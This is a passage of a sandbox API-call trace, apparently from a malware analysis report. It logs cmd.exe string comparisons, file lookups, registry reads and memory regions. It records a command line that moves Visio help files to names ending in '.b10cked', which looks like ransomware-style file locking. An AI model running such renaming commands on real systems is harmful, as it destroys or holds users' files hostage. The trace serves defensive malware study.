_wcsicmp (_String1="move", _String2="SET") returned -6 [0201.827] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0201.827] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0201.827] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0201.827] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0201.827] _wcsicmp (_String1="move", _String2="MD") returned 11 [0201.827] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0201.827] _wcsicmp (_String1="move", _String2="RD") returned -5 [0201.827] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0201.827] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0201.827] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0201.827] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0201.827] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0201.827] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0201.827] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0201.827] _wcsicmp (_String1="move", _String2="VER") returned -9 [0201.827] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0201.827] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0201.827] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0201.827] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0201.827] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0201.827] _wcsicmp (_String1="move", _String2="START") returned -6 [0201.827] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0201.827] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0201.827] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0201.829] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.829] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.829] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f39c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f394, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f394*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0201.829] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0201.829] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0201.829] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0201.829] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0201.831] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0201.831] _wcsicmp (_String1="MSVISI~1.HXN", _String2=".") returned 63 [0201.831] _wcsicmp (_String1="MSVISI~1.HXN", _String2="..") returned 63 [0201.831] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msvisi~1.hxn")) returned 0x2022 [0201.831] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1e1e38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.831] SetErrorMode (uMode=0x0) returned 0x0 [0201.831] SetErrorMode (uMode=0x1) returned 0x0 [0201.831] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN", nBufferLength=0x104, lpBuffer=0x12ed24, lpFilePart=0x12ed0c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN", lpFilePart=0x12ed0c*="MSVISI~1.HXN") returned 0x27 [0201.831] SetErrorMode (uMode=0x0) returned 0x1 [0201.831] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0201.831] _wcsicmp (_String1="MSVISI~1.HXN", _String2=".") returned 63 [0201.831] _wcsicmp (_String1="MSVISI~1.HXN", _String2="..") returned 63 [0201.831] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msvisi~1.hxn")) returned 0x2022 [0201.831] SetErrorMode (uMode=0x0) returned 0x0 [0201.831] SetErrorMode (uMode=0x1) returned 0x0 [0201.832] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN", nBufferLength=0x104, lpBuffer=0x12f1a0, lpFilePart=0x12ef38 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN", lpFilePart=0x12ef38*="MSVISI~1.HXN") returned 0x27 [0201.832] SetErrorMode (uMode=0x0) returned 0x1 [0201.832] SetErrorMode (uMode=0x0) returned 0x0 [0201.832] SetErrorMode (uMode=0x1) returned 0x0 [0201.832] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x12f3a8, lpFilePart=0x12ef38 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.14.1033.hxn.b10cked", lpFilePart=0x12ef38*="MS.VISIO.14.1033.hxn.b10cked") returned 0x37 [0201.832] SetErrorMode (uMode=0x0) returned 0x1 [0201.832] SetLastError (dwErrCode=0x0) [0201.832] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.visio.14.1033.hxn.b10cked")) returned 0xffffffff [0201.832] GetLastError () returned 0x2 [0201.832] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x12e8b4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e8b4) returned 0x1d0e68 [0201.832] FindNextFileW (in: hFindFile=0x1d0e68, lpFindFileData=0x12e8b4 | out: lpFindFileData=0x12e8b4) returned 0 [0201.833] FindClose (in: hFindFile=0x1d0e68 | out: hFindFile=0x1d0e68) returned 1 [0201.833] GetLastError () returned 0x12 [0201.833] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x12e8b4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e8b4) returned 0x1d0e68 [0201.833] FindNextFileW (in: hFindFile=0x1d0e68, lpFindFileData=0x12e8b4 | out: lpFindFileData=0x12e8b4) returned 0 [0201.833] FindClose (in: hFindFile=0x1d0e68 | out: hFindFile=0x1d0e68) returned 1 [0201.833] GetLastError () returned 0x12 [0201.834] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x1e1bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1e1bd8) returned 0x1d0e68 [0201.834] FindNextFileW (in: hFindFile=0x1d0e68, lpFindFileData=0x1e1bd8 | out: lpFindFileData=0x1e1bd8) returned 0 [0201.834] FindClose (in: hFindFile=0x1d0e68 | out: hFindFile=0x1d0e68) returned 1 [0201.835] GetLastError () returned 0x12 [0201.835] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x1e1bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1e1bd8) returned 0x1d0e68 [0201.835] FindNextFileW (in: hFindFile=0x1d0e68, lpFindFileData=0x1e1bd8 | out: lpFindFileData=0x1e1bd8) returned 0 [0201.835] FindClose (in: hFindFile=0x1d0e68 | out: hFindFile=0x1d0e68) returned 1 [0201.835] GetLastError () returned 0x12 [0201.835] _get_osfhandle (_FileHandle=2) returned 0xb [0201.835] GetFileType (hFile=0xb) returned 0x2 [0201.836] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0201.836] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12ea84 | out: lpMode=0x12ea84) returned 1 [0201.836] _get_osfhandle (_FileHandle=2) returned 0xb [0201.836] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x12eab8 | out: lpConsoleScreenBufferInfo=0x12eab8) returned 1 [0201.840] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0201.841] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x12eaf8 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0201.841] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x12eadc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12eadc*=0x2c) returned 1 [0201.842] longjmp () [0201.843] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.843] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0201.843] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.843] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0201.844] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.844] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0201.844] SetConsoleInputExeNameW () returned 0x1 [0201.844] GetConsoleOutputCP () returned 0x1b5 [0201.848] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.848] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.850] exit (_Code=1) Process: id = "478" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d20" os_pid = "0xe78" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.DEV.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29366 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29367 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29368 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29369 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 29370 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29371 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29372 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29373 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29374 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 29375 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29926 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29927 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29928 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29929 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 29930 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 29931 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29932 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29933 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29934 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29935 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29936 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29937 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29938 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29939 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29940 start_va = 0x410000 end_va = 0x4d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 29941 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29942 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29943 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 29944 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 29945 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 29946 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 29947 start_va = 0x4e0000 end_va = 0x5e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 29948 start_va = 0x5f0000 end_va = 0x11effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 29949 start_va = 0x11f0000 end_va = 0x1352fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011f0000" filename = "" Region: id = 29983 start_va = 0x1360000 end_va = 0x141ffff entry_point = 0x1360000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 675 os_tid = 0xddc [0202.487] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fecc | out: lpSystemTimeAsFileTime=0x16fecc*(dwLowDateTime=0xad80d820, dwHighDateTime=0x1d440a9)) [0202.487] GetCurrentProcessId () returned 0xe78 [0202.487] GetCurrentThreadId () returned 0xddc [0202.487] GetTickCount () returned 0x3924f [0202.487] QueryPerformanceCounter (in: lpPerformanceCount=0x16fec4 | out: lpPerformanceCount=0x16fec4*=25927650611) returned 1 [0202.488] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0202.488] __set_app_type (_Type=0x1) [0202.488] __p__fmode () returned 0x76b331f4 [0202.488] __p__commode () returned 0x76b331fc [0202.488] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0202.488] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0202.488] GetCurrentThreadId () returned 0xddc [0202.488] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xddc) returned 0x38 [0202.488] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.488] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0202.488] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.488] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.489] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fe5c | out: phkResult=0x16fe5c*=0x0) returned 0x2 [0202.489] VirtualQuery (in: lpAddress=0x16fe93, lpBuffer=0x16fe2c, dwLength=0x1c | out: lpBuffer=0x16fe2c*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.489] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fe2c, dwLength=0x1c | out: lpBuffer=0x16fe2c*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0202.489] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fe2c, dwLength=0x1c | out: lpBuffer=0x16fe2c*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0202.489] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fe2c, dwLength=0x1c | out: lpBuffer=0x16fe2c*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.489] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fe2c, dwLength=0x1c | out: lpBuffer=0x16fe2c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0202.489] GetConsoleOutputCP () returned 0x1b5 [0202.489] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.489] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0202.489] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.489] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0202.489] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.489] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.489] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.489] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.489] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.489] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.490] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.490] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0202.490] GetEnvironmentStringsW () returned 0x320190* [0202.490] FreeEnvironmentStringsW (penv=0x320190) returned 1 [0202.490] GetEnvironmentStringsW () returned 0x320190* [0202.490] FreeEnvironmentStringsW (penv=0x320190) returned 1 [0202.490] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16edcc | out: phkResult=0x16edcc*=0x40) returned 0x0 [0202.490] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16edd4, lpData=0x16edd8, lpcbData=0x16edd0*=0x1000 | out: lpType=0x16edd4*=0x0, lpData=0x16edd8*=0xb8, lpcbData=0x16edd0*=0x1000) returned 0x2 [0202.490] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16edd4, lpData=0x16edd8, lpcbData=0x16edd0*=0x1000 | out: lpType=0x16edd4*=0x4, lpData=0x16edd8*=0x1, lpcbData=0x16edd0*=0x4) returned 0x0 [0202.490] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16edd4, lpData=0x16edd8, lpcbData=0x16edd0*=0x1000 | out: lpType=0x16edd4*=0x0, lpData=0x16edd8*=0x1, lpcbData=0x16edd0*=0x1000) returned 0x2 [0202.490] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16edd4, lpData=0x16edd8, lpcbData=0x16edd0*=0x1000 | out: lpType=0x16edd4*=0x4, lpData=0x16edd8*=0x0, lpcbData=0x16edd0*=0x4) returned 0x0 [0202.490] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16edd4, lpData=0x16edd8, lpcbData=0x16edd0*=0x1000 | out: lpType=0x16edd4*=0x4, lpData=0x16edd8*=0x40, lpcbData=0x16edd0*=0x4) returned 0x0 [0202.490] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16edd4, lpData=0x16edd8, lpcbData=0x16edd0*=0x1000 | out: lpType=0x16edd4*=0x4, lpData=0x16edd8*=0x40, lpcbData=0x16edd0*=0x4) returned 0x0 [0202.490] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16edd4, lpData=0x16edd8, lpcbData=0x16edd0*=0x1000 | out: lpType=0x16edd4*=0x0, lpData=0x16edd8*=0x40, lpcbData=0x16edd0*=0x1000) returned 0x2 [0202.490] RegCloseKey (hKey=0x40) returned 0x0 [0202.491] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16edcc | out: phkResult=0x16edcc*=0x40) returned 0x0 [0202.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16edd4, lpData=0x16edd8, lpcbData=0x16edd0*=0x1000 | out: lpType=0x16edd4*=0x0, lpData=0x16edd8*=0x40, lpcbData=0x16edd0*=0x1000) returned 0x2 [0202.491] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16edd4, lpData=0x16edd8, lpcbData=0x16edd0*=0x1000 | out: lpType=0x16edd4*=0x4, lpData=0x16edd8*=0x1, lpcbData=0x16edd0*=0x4) returned 0x0 [0202.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16edd4, lpData=0x16edd8, lpcbData=0x16edd0*=0x1000 | out: lpType=0x16edd4*=0x0, lpData=0x16edd8*=0x1, lpcbData=0x16edd0*=0x1000) returned 0x2 [0202.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16edd4, lpData=0x16edd8, lpcbData=0x16edd0*=0x1000 | out: lpType=0x16edd4*=0x4, lpData=0x16edd8*=0x0, lpcbData=0x16edd0*=0x4) returned 0x0 [0202.491] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16edd4, lpData=0x16edd8, lpcbData=0x16edd0*=0x1000 | out: lpType=0x16edd4*=0x4, lpData=0x16edd8*=0x9, lpcbData=0x16edd0*=0x4) returned 0x0 [0202.491] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16edd4, 